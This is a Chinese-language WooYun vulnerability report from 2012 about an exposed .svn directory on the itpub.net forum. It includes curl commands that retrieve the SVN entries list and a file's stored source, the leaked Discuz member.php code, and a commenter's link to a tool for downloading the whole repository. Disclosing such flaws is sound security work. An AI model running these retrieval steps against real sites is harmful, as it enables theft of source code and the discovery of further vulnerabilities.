当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-05468

漏洞标题:itpub技术论坛源码下载

相关厂商:IT168.com

漏洞作者: 小雨

提交时间:2012-03-22 18:34

修复时间:2012-05-06 18:35

公开时间:2012-05-06 18:35

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-03-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-05-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

服务器设置不当,导致该网站源码可以被下载

详细说明:

网站使用svn管理版本,却未对.svn目录未加访问权限限制,

漏洞证明:

xxx@xxx /www/itpub.net $ curl http://www.itpub.net/.svn/entries
可以得到web根目录文件目录列表,根据那个列表,可以请求svn working copy的text-base
写一个简单的脚本就能遍历下载该站svn仓库中的全部源码。可以从源码进一步分析出更多安全漏洞
xxx@xxx /www/itpub.net $ curl http://www.itpub.net/.svn/text-base/member.php.svn-base
<?php
/**
* [Discuz!] (C)2001-2099 Comsenz Inc.
* This is NOT a freeware, use is subject to license terms
*
* $Id: member.php 20112 2011-02-15 07:10:53Z monkey $
*/
define('APPTYPEID', 0);
define('CURSCRIPT', 'member');
require './source/class/class_core.php';
$discuz = & discuz_core::instance();
$modarray = array('activate', 'clearcookies', 'emailverify', 'getpasswd',
'groupexpiry', 'logging', 'lostpasswd',
'register', 'regverify', 'switchstatus', 'connect');
$mod = !in_array($discuz->var['mod'], $modarray) ? 'register' : $discuz->var['mod'];
define('CURMODULE', $mod);
$discuz->init();
if($mod == 'register' && $discuz->var['mod'] != $_G['setting']['regname'] && !defined('IN_CONNECT')) {
showmessage('undefined_action');
}
require libfile('function/member');
require libfile('class/member');
runhooks();
require DISCUZ_ROOT.'./source/module/member/member_'.$mod.'.php';
?>

修复方案:

.svn目录加访问权限限制,你懂得。

版权声明:转载请注明来源 小雨@乌云


漏洞回应

厂商回应:

危害等级:暂时无回应

漏洞Rank:0

确认时间:2012-03-22 18:34

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2012-03-22 18:44 | 小雨 ( 普通白帽子 | Rank:105 漏洞数:19 | phper)

    @xsser 老大,能帮忙把它厂商改成it168吗?他们是一家的。

  2. 2012-03-22 20:06 | 小雨 ( 普通白帽子 | Rank:105 漏洞数:19 | phper)

    我写的那个小工具脚本等本问题确认修复之后会分享给大家

  3. 2012-03-23 00:22 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @小雨 多谢分享!

  4. 2012-03-25 11:07 | 小雨 ( 普通白帽子 | Rank:105 漏洞数:19 | phper)

    貌似他们一直都没反应,而且我看以前也有过报告.svn漏洞的例子了。这个工具就不藏着了。我的工具源码在: http://rains.im/?q=node/18